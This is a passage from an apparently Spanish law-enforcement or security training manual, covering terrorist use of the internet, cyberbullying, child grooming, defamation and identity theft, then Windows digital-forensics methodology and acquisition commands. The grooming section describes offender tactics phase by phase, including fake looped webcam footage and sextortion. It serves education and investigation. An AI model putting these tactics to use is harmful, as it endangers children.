través de determinados protocolos de comunicaciones.
• Mensajería instantánea.
• Foros que, al igual que las páginas web, pueden ser de libre acceso o de
acceso restringido.
• Correos electrónicos individuales o mediante listas de correos.
• Redes peer to peer (P2P).
Ilustración 43. Ejemplo de difusión de contenido ilícito.

FINANCIACIÓN
Tanto las propias organizaciones como los entramados de apoyo utilizan los mismos
canales que facilita Internet para conseguir financiación. Las vías utilizadas pueden
resumirse en los siguientes puntos.
• Apoyo financiero directo, solicitado a través de páginas web, foros, chats e
incluso mediante el envío masivo de correos electrónicos.
• Ventas online de productos como libros, vídeos, grabaciones, etc.
• Trasferencias económicas realizadas a través de sistemas electrónicos
como Ukash, Paysafe o PayPal.
• La utilización de asociaciones pantalla constituidas o utilizadas para actuar
de intermediarios y donde recibir donaciones bajo distintos conceptos que
finalmente son desviados a las organizaciones.
COMUNICACIONES
Las distribuciones operativas suelen estar basadas en pequeños grupos o células
independientes y autónomas, situadas en puntos geográficos distintos y sin relación
directa entre ellas. Internet es el medio ideal para la comunicación de estos grupos con
sus superiores jerárquicos y con los grupos de apoyo logístico.
Los mensajes pueden ser enviados desde cibercafés u otros establecimientos donde no
se exige una identificación para el acceso a Internet o a través de conexiones establecidas
desde computadoras bajo protocolos que garanticen su anonimato, como es el uso de
la deep web y de los correos electrónicos a través de la red TOR.
Para el cifrado de mensajes pueden utilizar tanto programas comerciales como otros
especialmente diseñados por colaboradores. Este es el caso de Mujahideen Secrets,
desarrollado por un equipo cercano a Al-Qaeda que permite el cifrado de textos, ficheros,
mensajes de correo y de chat.
Ilustración 44. Programa Mujahideen Secrets

2.6. Otros ciberdelitos
CIBERACOSO Y CIBERBULLYING
Podríamos definir el ciberacoso como una agresión psicológica que perdura en el

tiempo, ocasionada por una o varias personas, dirigida contra otra y que se efectúa
utilizando las tecnologías de información y comunicación. Se trata, por lo tanto, de la
mera traslación ta la esfera de las TIC de una acción de humillación real. Por lo general,
el ciberacoso es acompañado por acciones de acoso directo, por lo que el realizado a
través de la red es una continuación del efectuado en el mundo real.
Si, además, incluimos otro elemento diferenciador como es la edad de los que actúan,
podemos referirnos al ciberbullying como un tipo específico de acoso en el que tanto
el acosador como la víctima son NNA (en edad escolar) y en el cual, igual que en el
ciberacoso, se utilizan las TIC como medio para llevarlo a término.
Los ciberacosadores utilizan la red para obtener información de sus víctimas, a las
que realizan un seguimiento online y, en el caso de tener los conocimientos técnicos
necesarios, espiar accediendo a sus cuentas y perfiles electrónicos, como plataforma
para reforzar su acoso.
Dos circunstancias agravan el acoso online en comparación con lo que sucedería fuera
de la red. La primera es que a través de Internet el acosador puede efectuar un ataque
con total anonimato, sin que la víctima conozca quién es el autor real. La segunda es la
persistencia en el tiempo y la universalidad de la humillación si se realiza en canales
abiertos o semiabiertos, como pueden ser las redes sociales. Estas características
multiplican la sensación de indefensión, humillación e inseguridad de la víctima,
impidiéndole una defensa efectiva.
Podríamos incluir también como elemento diferenciador entre el ciberacoso y el
ciberbullying la finalidad con la que se comete. De manera general, lo que motiva el
acoso entre adultos son las relaciones personales, sexuales o laborales; mientras que,
cuando se trata de acosos entre NNA, la única razón es la humillación pública.
Por lo tanto, las características que definen y diferencian estas conductas lesivas de
acoso son:
• El ciberbullying se da entre NNA, en edad escolar. Cuando no se da esta
condición y se trata de adultos, utilizamos el término genérico de ciberacoso.
• El medio que se utiliza para llevarlo a cabo o para hacerlo expansivo son las
tecnologías de información y comIunicación, entre las que podemos citar
como ejemplo los siguientes canales a través de los que se reciben, publican
o difunden comentarios humillantes, vejatorios, amenazantes, sexuales, etc.
1. Telefonía móvil multimedia, con capacidad de realizar y
difundir mensajes, fotos y vídeos.
2. Mensajería instantánea, chats públicos, correo electrónico
y foros de discusión.
3. Correo electrónico.

4. Redes sociales.
5. Plataformas de publicación de fotos o vídeos.
• La finalidad con la que se realiza es diferente para el ciberbullying que para

el ciberacoso. El ciberacoso presenta trasfondos variados, entre los que
destacan:
1. El laboral, cuando se utilizan las nuevas tecnologías
para lanzar informaciones que causan descrédito sobre la
víctima como medida para impedir o dificultar un desarrollo
profesional.
2. Sexuales, cuando se pretende obtener imágenes o vídeos
personales de contenido sexual a través del acoso.
3. Personal, cuando se utiliza como venganza. Un ejemplo
pueden ser las publicaciones de imágenes íntimas de
exparejas en redes sociales o páginas de contacto con
finalidades como la humillación o la negociación ventajosa
en el proceso de separación. Otro caso es la difusión pública
de información privada, conociendo el daño que va a causar
en la imagen de la víctima o en sus relaciones personales.
4. Por imitación o réplica, en caso de la difusión exponencial
de contenidos personales sin haber tenido relación directa
con su obtención y que, al difundirse masivamente,
multiplican la humillación de la víctima del acoso.
• En cuanto a la finalidad del ciberbullying, como se ha citado antes, es

únicamente la de la humillación de la víctima por un grupo con los que está
directamente relacionado al compartir actividades escolares o deportivas.
Se trata de una prolongación a la red de la intimidación, insultos, rechazo
social y agresiones físicas que sufre en su actividad diaria y que se sustenta
en la relación de poder que los autores o acosadores tienen sobre la víctima.
Cuando las víctimas son los profesores o educadores y los autores son los
alumnos que buscan humillarlos, al acoso se le conoce como ciberbaiting.
En ambos tipos de acoso encontramos las siguientes características, que se deben dar
para considerarlo como tal:
• El acoso debe ser repetido, no puntual. Un hecho aislado no es ciberacoso.
• Se puede dar cierta jerarquía de poder entre el acosador o acosadores
respecto de la víctima. Entre NNA se da siempre y entre adultos suele ocurrir
en las relaciones de acoso laboral y sexual.
• La inmediata difusión de los ataques a través de Internet y la dificultad en su
eliminación, asociada a su permanencia en el tiempo, amplifica el impacto
del daño producido a la víctima.

• • La situación de acoso, para ser considerada ciberbullying, no debe tener
elementos de índole sexual ni ser causada por un adulto. En tal caso estaríamos
ante una situación de grooming.
GROOMING
También es conocido como child grooming o Internet grooming. Se trata de un acoso
originado por un adulto y dirigido a un NNA cuyo objetivo final es la aproximación física
con intenciones sexuales. Durante el grooming, el autor utiliza la red como medio para
ganarse la confianza de su víctima, sirviéndose de todo tipo de estrategias dirigidas a
establecer una previa conexión emocional. Con ella, logra que el NNA realice actos de
naturaleza sexual, ya sean de manera voluntaria o forzada. En primer lugar, será virtual
y, después, real.
Se trata del contacto con un NNA de 16 años que tiene como finalidad la realización última
de alguno de los delitos citados. Es básicamente una anticipación en la protección, se
adelanta la barrera penal a partir de la cual se sanciona y, por lo tanto, el mero contacto
con estos NNAs puede dar lugar a la sanción penal.
En el desarrollo del grooming se da cabida a otros delitos como son las amenazas, los
daños informáticos y el propio acoso; sin embargo, todos estos delitos se cometen con
la finalidad de culminar un ataque de carácter sexual.
FASES DEL GROOMING

El modo o las formas a través de las cuales el autor de un grooming desarrolla su conducta
delictiva depende de muchos factores, como la existencia de una previa relación
con la víctima, la edad del NNA, el dominio que el autor tenga de las comunicaciones
electrónicas y la experiencia que haya ido acumulado en delitos similares. No obstante,
se puede describir un ataque típico de grooming siguiendo las siguientes fases:
FASE 1. CONTACTO CON EL NIÑO, NIÑA O ADOLESCENTE (NNA)

Iniciada generalmente a través de las redes sociales dirigidas a NNAs o en foros o páginas
web donde acuden y participan. El autor se hace pasar por un niño o niña de edad similar
que comparte sus gustos y aficiones. El objetivo de esta fase es obtener direcciones de
correo electrónico o de mensajería instantánea privada del NNA.
FASE 2. GANARSE LA CONFIANZA, OBTENCIÓN DE INFORMACIÓN
A través de conversaciones, más o menos intrascendentes, donde se muestra cómo
alguien comparte los mismos gustos sobre deporte, música, juegos, etc., el autor
consigue que la víctima le facilite información sobre su vida privada y la de su familia,
como su dirección, colegio o instituto al que acude, deportes que practica y donde los
realiza, actividades de los padres, conflictos familiares y escolares, etc.
Con frecuencia inician contactos a través de webcam, si bien el acosador se sirve de una
grabación en bucle, donde él no se muestra. Esta falsa grabación ha sido efectuada bien
por el autor a una víctima anterior o la ha obtenido a través de Internet.

Durante esta fase, el adulto se convierte en una persona de confianza del NNA, al que le
puede contar sus inquietudes en la creencia que las entiende y comparte. Si el NNA sufre
cualquier tipo de conflicto familiar o social, encontrará en su amigo online alguien en
quien apoyarse.
Si dispone de los conocimientos técnicos necesarios, utilizará malware para acceder
al contenido del ordenador de la víctima, a las cuentas electrónicas que utilice y a la
webcam, con la que grabará toda la vida íntima de la víctima.
FASE 3. INTERCAMBIO DE IMÁGENES O VÍDEOS, SEDUCCIÓN

El autor inicia conversaciones con pequeñas connotaciones sexuales no explícitas,
pidiendo o enviando imágenes donde aparezcan partes del cuerpo desnudo o
semidesnudo. Hay que tener en cuenta que en muchas ocasiones las víctimas son
tan pequeñas que no tienen la experiencia vital suficiente como para entrever esas
connotaciones sexuales, por lo que generalmente acceden a enviar imágenes sin ser
conscientes de lo que están haciendo realmente, ya que lo ven como un simple juego.
Poco a poco van convenciendo a los NNAs para que realicen actos de naturaleza sexual
explícita delante de la webcam, que son grabados sin su consentimiento. Si es necesario
—para reforzar la idea de que se trata de un juego— el NNA verá a través de su ordenador
al supuesto amigo que realiza consigo mismo actos similares a los que le pide. En
realidad, es una grabación previa efectuada a otra víctima.
Si la víctima tiene mayoría de edad y cierta madurez sexual, una de las tácticas que
emplea es la de cibernovio o cibernovia. En este caso, se mostrará como alguien
físicamente muy atractivo, un poco mayor, con experiencia y vida atrayente.
FASE 4. ACOSO
Una vez que ha obtenido las grabaciones y fotografías del NNA, el autor se muestra
como es, exigiendo que continúe realizando actos sexuales cada vez más explícitos.
Para lograrlo le amenazará con distribuir las imágenes que ya tiene entre los familiares
y amigos de la víctima. Le mostrará las grabaciones que de forma consentida o no (a
través de la webcam) le ha realizado. Le cambiará la palabra de acceso a su correo
electrónico y otras acciones con las que pretenderá que el NNA se vea obligado, por
miedo o vergüenza, a acceder a lo que le solicite.
En ocasiones, las más graves, el autor pide a cambio de no distribuir el material que
posee un encuentro físico y sexual con el NNA.
FASE 5. DIFUSIÓN
En la inmensa mayoría de los casos, una vez humillado el NNA hasta los extremos que el
autor considere suficientes, las imágenes y grabaciones de vídeo son distribuidas entre
los amigos y familiares de la víctima, con la simple intención de causar daño. En otras
ocasiones, no excluyentes, piden que les faciliten nombres y direcciones de correo de
otros NNAs a los que acosar.

DELITO DE INJURIAS
Este delito puede cometerse tanto a través de una acción como de una expresión (incluso
podría hacerse a través de alguna omisión que pueda producir los mismos efectos que
la acción). No hay duda de que las principales condenas por injurias se producen a
través de expresiones.
DELITO DE CALUMNIAS
Para que estemos en presencia de un delito de calumnias, son necesarios los siguientes
requisitos:
• Es necesario que se impute un delito.
• Que la imputación se haga respecto de una persona claramente
identificable.
• Que se determine claramente el delito, el objeto del delito y la persona
imputada. Las expresiones genéricas como «ladrón» o «asesino» pod rán ser
como mucho constitutivas de un delito de injurias.
Estos delitos de injurias y calumnias son delitos que únicamente pueden ser perseguibles
a instancia de parte y no de oficio, con lo que es necesaria la querella del agraviado
para iniciar su tramitación.
Durante largo tiempo nos encontramos con delitos cometidos por medio de la palabra,
ya sea expresada oralmente o de forma escrita generalmente en medios tradicionales
(prensa o revistas); pero, en el momento actual, tras la aparición de Internet y su acceso
generalizado entre todos los sectores de la población, surgen nuevos mecanismos de
comunicación que tienen no solo un carácter bilateral (correo electrónico, SMS o similar),
sino en la mayoría de las ocasiones multilateral, donde las opiniones y manifestaciones
de cada uno se ponen en conocimiento de miles de personas de forma prácticamente
inmediata, situación que se produce en el ámbito de las redes sociales. Un elemento
importante en este ámbito es la cuestión de la publicidad.
LA SUPLANTACIÓN DE PERSONALIDAD EN EL ÁMBITO DE LAS

REDES SOCIALES
Internet y, concretamente, las redes sociales, se han convertido en un instrumento
utilizado por algunos usuarios para adoptar la identidad de otros a través, por ejemplo,
de la creación de perfiles falsos y realizando manifestaciones y declaraciones en nombre
de un tercero ajeno a todo ello.
En definitiva, de lo que se trata de analizar es de si esta usurpación de identidad debe ser
calificada como delito y ser juzgada, por lo tanto, en vía penal, o si simplemente puede
dar lugar a una exigencia de responsabilidad por los daños que se le pueda causar a la
persona suplantada.

Para el análisis de estos supuestos, vamos a analizar la expresión «usurpación de
identidad» en sentido amplio, como también los diferentes casos que nos podemos
encontrar, aunque en ocasiones y con una mayor precisión se distinguen dos conceptos.
• Suplantación de personalidad. Se adquieren los derechos y facultades de

otro, pero sin realizar ninguna actuación que da lugar a que se confundan las
personas. Simplemente se utiliza otro perfil para enmascarar la identidad del
suplantante.
• Usurpación de identidad. En este supuesto la persona ya realiza una serie de
actuaciones que hacen parecer que los derechos que se ejercen corresponden
al usurpado y se finge ser esta persona para poder ejercer sus derechos. Actúa
el suplantado de forma continua con la intención de hacerse pasar por el otro.
Diferentes supuestos en que nos podemos encontrar:

• Se registra un perfil falso. No se utilizan otros datos personales de la persona
suplantada.
En estos casos no estaríamos en presencia de una conducta delictiva, el mero hecho

de registrar un perfil falso con nombre y apellidos sin utilizar datos personales no se
considera acto delictivo. Otra cosa distinta es si, como consecuencia de las declaraciones
realizadas a través de ese perfil falso, se causara algún tipo de perjuicio al suplantado:
no existiría un ilícito penal, pero se podría exigir algún tipo de responsabilidad civil.
• Se registra un perfil falso y se utilizan más datos personales, como puede
ser la imagen u otros datos del suplantado.
En este caso sí se podría estar en presencia del delito, además de que se estaría
vulnerando el derecho a la propia imagen de la persona suplantada.
• Acceso a la cuenta de, por ejemplo, Facebook o Twitter del suplantado para
posteriormente utilizarla.
En este caso nos podríamos encontrar con diferentes conductas punibles partiendo de
la usurpación de identidad.
Así, y dependiendo de la forma de acceso y de lo que se haga, podemos estar en
presencia de varios delitos:
o Secreto de telecomunicación, si tiene acceso a correos electrónicos.
o Divulgación de secretos, si se apodera de datos personales.
o Acceso a un sistema de información sin consentimiento, en el supuesto de
acceso no consentido.

ANÁLISIS
FORENSE

1. Introducción al Análisis
Forense I
1.1. Primera aproximación al análisis forense informático.
El análisis forense informático o digital surge de la necesidad de poder encontrar pruebas

que ayuden a resolver un delito o incidente de seguridad aplicando técnicas científicas y
analíticas a los sistemas de información digitales.
OBJETIVOS DEL ANÁLISIS FORENSE DIGITAL

El análisis forense digital es utilizado para extraer datos de dispositivos electrónicos y
transformarlos en información operativa que pueda ser tratada y analizada para poder
resolver un delito.
El objetivo de cualquier análisis forense es poder responder a las clásicas cuestiones
sobre qué, quién, cómo, cuándo y por qué tuvieron lugar los hechos delictivos y actuar en
consecuencia
ÁMBITOS DEL ANÁLISIS FORENSE DIGITAL

El análisis forense digital puede aplicarse en dos ámbitos o contextos diferenciables:
a) Gestión de incidentes: La aplicación de técnicas forenses para resolver un incidente
interno. Por ejemplo, intrusiones en la red, infecciones por malware o phishing.
b) Peritaje judicial: El análisis forense se realiza dentro de un procedimiento judicial o
causa penal.
1.2. Evidencia digital y artefactos

Uno de los términos que es necesario conocer dentro de los análisis forenses informáticos
es la evidencia digital.
La evidencia digital es una pieza de información almacenada o transmitida a través de un
sistema informático y que puede utilizarse como prueba en un proceso judicial, además,
puede relacionar un hecho delictivo con la víctima o el autor del delito.
Otro término importante es el de artefacto. Un artefacto puede ser cualquier log del

sistema, metadatos, registros, copias de seguridad, etc., de los que se pueda extraer una
evidencia digital.
FASES DE UN ANÁLISIS FORENSE INFORMÁTICO

En un análisis forense informático se pueden diferenciar cuatro fases que definen
una metodología a seguir durante una investigación: identificación y adquisición,
preservación, análisis y documentación.
FASE 1: IDENTIFICACIÓN Y ADQUISICIÓN

En la primera fase de un análisis forense, lo primero que hay que realizar es un breve estudio
del escenario del delito. En función de ese análisis, se realizarán las tareas adecuadas y
específicas para poder extraer las pruebas necesarias (adquisición) y evitar contaminar
lo mínimo posible el escenario.
Siempre que sea posible, debemos trabajar con copias de los soportes de información,
en caso contrario, estaríamos modificando y contaminando las pruebas originales de
un delito y no podrían ser utilizadas en un juicio, o bien, perderían credibilidad para la
resolución de un incidente de seguridad privado.
La adquisición de los datos debe priorizarse cuanto mayor es la volatilidad de los datos.
Ilustración 1. Prioridad de extracción
Podemos adquirir dos tipos de datos: volátiles y no volátiles.
DATOS VOLÁTILES
Son aquellos datos que se pierden cuando el sistema se apaga y no son recuperables.
Por ejemplo:
• Servicios en ejecución.

• Usuarios autenticados.
• Ficheros en uso.
• Procesos de memoria.
• Memoria RAM.
• Memoria caché.
DATOS NO VOLÁTILES
Los datos no volátiles o persistentes permanecen en los soportes de información, aunque
el sistema se apague o reinicie, por ejemplo:
• Ficheros del sistema.
• Documentos ofimáticos, imágenes, audios, etc.
• Logs del sistema.
ENTORNOS DE ANÁLISIS
Durante la fase de identificación y adquisición tendremos que identificar el tipo de
entorno al que nos enfrentamos. Según el estado en el que nos encontremos el sistema
sobre el que tenemos que realizar el análisis forense, aplicaremos diferentes técnicas
para la extracción de los datos.
Podemos diferenciar dos tipos de entornos de análisis, análisis en caliente y análisis
post mortem.
ANÁLISIS ONLINE
Este tipo de análisis se aplica cuando el sistema se encuentra encendido.
Este estado es el ideal para poder extraer la información volátil, pero es fácil contaminar
el sistema al realizar esta tarea. Actualmente existen herramientas especializadas en
la adquisición de los datos volátiles y que apenas interactúan o modifican el sistema
durante el proceso. Por ejemplo, para la adquisición de la memoria RAM, podemos utilizar
herramientas como Memoryze o DumpIT. Para poder analizar el contenido de la imagen
adquirida, podemos nombrar a Volatility como herramienta principal.
ANÁLISIS OFFLINE
Cuando el sistema está apagado tendremos que aplicar un análisis offline.
En este estado podemos extraer la información no volátil sin alterar las evidencias de
los datos volátiles, siempre trabajando con una copia de seguridad de los soportes
de información. Para adquirir la información no volátil, nos ayudaremos de las suites
forenses, como Caine, Autopsy y herramientas como la suite de Nirsoft.
FASE 2: PRESERVACIÓN DE LAS EVIDENCIAS

Un error en la manipulación y preservación de las evidencias recogidas puede dar lugar

a que no puedan ser aceptadas ante un tribunal o prueba pericial, surge la necesidad de
una cadena de custodia.
La cadena de custodia es una metodología aplicada a las evidencias relacionadas con
el incidente o delito desde que se identifican en la escena hasta que son analizadas en
el laboratorio.
El objetivo es poder asegurar la integridad, preservación y la trazabilidad de las
evidencias para que no puedan ser impugnadas bajo sospecha de una mala práctica o
manipulación de las evidencias.
La cadena de custodia consiste en una serie de formularios cumplimentados con
información de la evidencia física, pudiendo incluir, entre otros datos:
• Fecha de la adquisición.
• Persona que realiza la adquisición.
• Modelo, número de serie, fabricante, etc.
• Ubicaciones y traslados de la evidencia.
Las evidencias digitales, tales como imágenes de disco, RAM, ficheros, documentos, etc.
deben estar acompañadas de su hash, ya que es la única forma de verificar que dicha
evidencia no ha sido alterada desde su adquisición.
Ilustración 2. Formulario cadena de custodia

FASE 3: ANÁLISIS DE LAS EVIDENCIAS
Entramos en la fase más técnica dentro de la metodología de un análisis forense. En
esta fase se utilizan las herramientas software y físicas especializadas en analizar los
datos adquiridos para identificar el motivo del delito, las acciones y los actores que han
participado.
La destreza, experiencia y conocimiento del analista es fundamental para resolver un
análisis forense con éxito, aun así, no siempre será posible esclarecer los hechos por la
falta de evidencias.
El análisis forense debe realizarse dentro del rango temporal durante el cual acaecieron
los hechos delictivos. Para ello, es necesario acotar la investigación en el tiempo. Es
prácticamente imposible, y poco práctico, analizar todos los datos almacenados a lo
largo del tiempo y que no tienen por qué mantener relación con el incidente. Por ejemplo,
un log de un sistema que no se ha rotado durante todo el año no debería analizarse
por completo, tan solo la sección afectada por el marco temporal de interés. Una vez
acotada la investigación forense, se procederá a reconstruir la línea temporal del delito,
la cual proporcionará una reconstrucción cronológica y comprensión de los hechos que
han tenido lugar.
Ilustración 3. Línea temporal cronológica
Durante la fase de análisis de un sistema tendremos que examinar multitud de artefactos

para la obtención de evidencias, por ejemplo:
• Correos electrónicos.
• Fotos digitales.
• Historial de navegación.
• Dispositivos de almacenamiento conectados.
• Usuarios y grupos del sistema.
• Logs del sistema y de los servicios.
• Tareas programadas.
• Ficheros de paginación.

• Aplicaciones del inicio del sistema.
• Entre otros…
FASE 4: DOCUMENTACIÓN Y REPORTING

En esta última fase de un análisis forense se redactan los informes técnicos y ejecutivos
que documentan los antecedentes del delito.
En los informes debe verse reflejada la metodología empleada durante el análisis, el
trabajo realizado, el impacto y las conclusiones del análisis forense.
Un informe ejecutivo contendrá un resumen de todo el análisis forense con un lenguaje
poco técnico ya que, así lo requiere el público al que está destinado este tipo de informes
ejecutivos. Algunos aspectos básicos que debe contener este informe son:
• Motivaciones del delito:
o Finalidad del incidente.
o Por qué ha tenido lugar.
• Desarrollo del incidente
o Como evolucionó el incidente.
o Acciones realizadas en los sistemas.
• Resultados del análisis:
o Hechos ocurridos.
o Identificación de los autores.
o Impacto del delito o incidente.
• Recomendaciones.
Por el contrario, en un informe técnico, el detalle del análisis es mucho mayor y requiere
de conocimiento técnico para su comprensión.
Además de los aspectos básicos de un informe ejecutivo, también debería contener los
siguientes:
• Antecedentes del incidente:
o Estado anterior de los sistemas y controles de seguridad.
• Recolección de datos:
o Cómo se han adquirido los datos.
o Datos recolectados.
• Descripción avanzada de las evidencias obtenidas.
• Entorno de laboratorio en el que se ha realizado el análisis:
o Herramientas empleadas.
• Análisis de las evidencias.
• Descripción de los resultados.
o Herramientas empleadas por el autor del delito.
o Alcance del incidente.
• Línea temporal de los hechos.
• Conclusiones y recomendaciones, así como puntos de mejora y futuras buenas
prácticas.
ANÁLISIS FORENSE EN SISTEMAS OPERATIVOS PROPIETARIOS

El análisis forense en entornos propietarios como Windows, requiere de herramientas

especializadas y orientadas a la adquisición y análisis de datos de estos sistemas.
Es imprescindible conocer bien estas herramientas para poder escoger la adecuada en
cada escenario y que ocasione el menor impacto posible en los datos del sistema.
Ilustración 4. Sistema Windows.
ADQUISICIÓN DE DATOS VOLÁTILES

La adquisición de datos volátiles no solo hace referencia a la memoria RAM, existe gran
cantidad de información volátil en procesos, conexiones de red, contraseñas, etc. que, en
su conjunto, pueden suponer la resolución de un delito.
Hay que tener en cuenta el orden de volatilidad, tal y como ya se describió en el tema
anterior para poder recuperar el mayor número de evidencias posibles.
A continuación, veremos algunas de las herramientas especializadas en la adquisición
de datos volátiles.
ADQUISICIÓN DE MEMORIA RAM

La memoria RAM solo puede capturarse cuando el sistema está encendido. Es posible
adquirir la memoria RAM tanto de forma local como remota.
Algunas herramientas destacables son:
• Memoryze: es una herramienta desarrollada por Mandiant para la extracción

y análisis de la memoria RAM que puede ser ejecutada en entornos Windows.

• DumpIT: fue diseñada por MoonSols, pero el proyecto fue descontinuado. Aun
así, es una de las herramientas más empleadas dada la simplicidad de su
ejecución. Puede encontrarse en algunos repositorios de GitHub.
• F-Response: es una suite que, entre otras muchas capacidades, permite
extraer la memoria RAM de un sistema remoto utilizando el servicio iSCI.
Ilustración 5. F-Response
ADQUISICIÓN DE INFORMACIÓN BÁSICA DEL SISTEMA

La recolección de información básica del sistema permite establecer un contexto en el
análisis forense, identificar el sistema en los logs y generar una línea temporal del delito:
• Fecha y hora: Se deben obtener los datos temporales al principio y al final del
análisis para establecer la línea temporal.
• Información del sistema: Datos como la versión del sistema operativo,
hostname, tiempo de encendido y parches instalados.
• Usuarios: El usuario actual, así como los usuarios conectados al sistema.
• Configuración de red: El direccionamiento de red del sistema, protocolos,
vpns, etc.
• Información sobre procesos: Procesos y servicios en ejecución.
• Recursos de red compartidos: Los recursos de almacenamiento compartidos
puede ser de interés en el análisis forense.
• Tareas programadas: Es muy común que se utilice este servicio para
conseguir persistencia, sobre todo en infecciones por malware.
En la siguiente tabla, se nombran algunos de los comandos que permiten recolectar la

información básica de un sistema operativo Windows:

Tabla 1.Comandos de recolección básicos
Dato Comando
Fecha date /t
Hora time /t
Hostname hostname
Red ipconfig /all
Usuario actual whoami
Versión ver
systeminfo | find “Tiempo de arranque

Uptime
del sistema”
Entorno systeminfo
Usuarios conectados quser
Conexiones de red
netstat -ano
activas
Peticiones DNS
ipconfig /displaydns
realizadas
Conexiones netbios net session
Tabla ARP arp -a
Procesos tasklist -V
Ficheros abiertos OpenedFilesView
Recursos compartidos net share

Tareas programadas schtasks
Si creemos que el sistema puede estar comprometido, deberemos emplear versiones

legitimas de estos programas que podamos ejecutar desde un medio extraíble. En
ocasiones, el malware puede sustituir algunos binarios del sistema con intenciones
maliciosas, como, por ejemplo, un falso tasklist que oculte el proceso del malware para
que éste no sea detectado.
ADQUISICIÓN DE DATOS NO VOLÁTILES

La adquisición de datos no volátiles es el siguiente paso en la cadena de volatilidad
tras los datos volátiles. Estos datos son persistentes y pueden extraerse tanto en análisis
online como en análisis offline, siempre teniendo en cuenta el escenario investigado.
ADQUISICIÓN DE UNIDADES DE ALMACENAMIENTO

Tradicionalmente, la adquisición de unidades de almacenamiento se ha realizado
con el sistema apagado y duplicando los datos en otra unidad externa conectada.
Actualmente, esto no siempre ocurre, el tamaño de las unidades de almacenamiento se
ha incrementado exponencialmente y, en ocasiones, no resulta útil clonar tal volumen de
datos cuando el delito puede ser acotado en un marco temporal objeto del análisis. En
otros casos, puede tratarse de sistemas en alta disponibilidad y no pueden ser apagados
para realizar la adquisición, obligando al analista a extraer los datos necesarios en vivo.
La adquisición de unidades de almacenamiento en vivo puede realizarse a través de la
herramienta “dd” portable, conectada al sistema a través de una unidad extraíble. La
sintaxis del comando es similar al utilizado para la adquisición de la memoria RAM:
También se puede utilizar una variación del comando “dd”, llamado “dc3dd”, que mejora
la velocidad de copia de los datos, realiza el cálculo del hash de la imagen en paralelo y
proporciona más estadísticas de la operación al usuario.
Otra alternativa es utilizar la herramienta “FTKImager”, entre otras muchas opciones.
ADQUISICIÓN DE CONFIGURACIONES DEL SISTEMA

Dependiendo del tipo de delito, el análisis forense se centrará en la investigación de
datos más o menos concretos. Existen configuraciones del sistema que son de interés
para el análisis y deben ser revisadas, ya que pueden contener la clave para la resolución
de una intrusión o una infección por malware, por ejemplo:
• Configuraciones de seguridad: Evaluar las configuraciones relacionadas

con la seguridad del sistema puede ayudar a detectar brechas de seguridad
que hayan podido ser aprovechadas con fines maliciosos. Por ejemplo, el
estado del parcheo y actualización del sistema, reglas de firewall, registros de

auditoría y logging.
• Relaciones de confianza: Existen unos ficheros donde se almacenan redes y
hosts sobre los que existe una relación de confianza, para, por ejemplo, evitar
realizar peticiones de resolución de nombres al DNS de la red y confiar en
una resolución definida estáticamente en estos ficheros. Estos ficheros se
encuentran en “%windir%\system32\drivers\etc\”:
• hosts: Contiene una asociación entre una dirección IP y el hostname o dominio
asignado.
• networks: Mantiene la asociación entre rangos de red y los nombres asignados.
• lmhosts: Realiza el mapeo entre direcciones IP y los nombres NetBios de las
máquinas.
• Prefetch files: Cuando un programa se ejecuta por primera vez, Windows crea
un fichero “prefetch” para mejorar la velocidad de inicio en las ejecuciones
posteriores. También queda registrada la fecha de la primera ejecución de
un programa, por ejemplo, de un malware o rootkit, además de la última
fecha de ejecución. Los ficheros prefetch se encuentran en el directorio
“%systemroot%\prefetch”.
• Autoinicio de aplicaciones: Una de las técnicas más habituales para
conseguir la persistencia de malware, rootkits y puertas traseras, es configurar
el auto inicio en el arranque del sistema. Existen varias posibilidades, como la
ubicación en directorios concretos, entradas de registro, tareas programadas
o ficheros del sistema. Por ejemplo, en Windows, las aplicaciones que pueden
iniciarse automáticamente en el inicio del sistema se encuentran en la entrada
del registro
“[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]”.
• Cuentas de usuario: Investigar las nuevas cuentas de usuario, aquellas que
no tienen contraseña definida, los grupos y los usuarios añadidos a estos.
Es otra formar de ganar persistencia con acceso al sistema y un punto de
revisión importante en cualquier investigación.
ADQUISICIÓN DE OTROS DATOS RELEVANTES

También podemos encontrar evidencias analizando los siguientes puntos de control:
• Registros de logs: Cualquier acción que haya tenido lugar en el sistema

genera una entrada en el registro de eventos de Windows. Los intentos de
logging fallidos en el sistema se registran en el log de eventos de seguridad,
las acciones del antivirus, por ejemplo, quedan registradas en el log de
aplicaciones. Podemos extraer estos logs de un sistema vivo con la herramienta
“wevtutil” y analizarlos en el laboratorio.
• Sistemas de ficheros: El análisis de los ficheros almacenados puede revelar
información de interés para la resolución del caso. Es necesario investigar los
elementos de la papelera de reciclaje, ficheros ocultos y los “Alternate Data
Stream”.
• Registro: El registro de Windows contiene toda la información sobre
configuraciones, datos de aplicaciones y actividades que han tenido lugar en
el sistema, por lo que es un recurso imprescindible en el análisis. La exportación
de todas las ramas del registro podemos hacerlo a través de la herramienta
“RegRipper”. Por ejemplo, podemos identificar los dispositivos USB que fueron
conectados, como los dispositivos de almacenamiento extraíbles.
• Datos de navegación: A través de la investigación de estos datos es posible
determinar qué dominios visitó el usuario y detectar la descarga de malware

mediante el uso de técnicas como “drive-by-downloads”. Esta técnica permite
la descarga silenciosa de binarios cuando se visita un host que distribuye
malware. Además, las cookies almacenadas pueden contener datos de
interés.
Ilustración 6. RegRipper
SUITES DE ANÁLISIS FORENSE

Las suites y frameworks de análisis forense proporcionan al analista forense un entorno
con herramientas de adquisición y análisis de datos. La mayoría de las suites son
booteables, basadas principalmente en sistemas Linux y, permiten el análisis de los datos
sin necesidad de ejecutar las herramientas en el sistema operativo objeto del análisis.
A continuación, vamos a describir algunas de las suites y frameworks de forensia más
destacadas:
• Autopsy: es una de las herramientas más utilizadas de código abierto. Permite

analizar entornos UNIX y Windows a través del conjunto de herramientas que
integra. Además, permite extender sus capacidades de análisis a través de
complementos y plugins. Relacionada a “Autopsy”, nos encontramos con
“The Sleuth Kit”, otra colección de herramientas para el análisis de imágenes
de disco forenses. “Autopsy” se integra con “The Sleuth Kit” proporcionando
un entorno gráfico que facilita la operación de análisis.
• Caine: es una distribución basada en Linux que proporciona un entorno de
• análisis forense integrando herramientas opensource y freeware para el
análisis de sistemas Windows y Linux. El objetivo de esta distribución es facilitar
las tareas de las diferentes fases del análisis forense, una interfaz gráfica “user-

friendly” y la portabilidad de la distribución al ser una “live CD”.
• SIFT: otra distribución basada en Linux creada por SANS para el análisis forense.
También incorpora un gran número de herramientas open source y cuenta
con el respaldo de SANS.
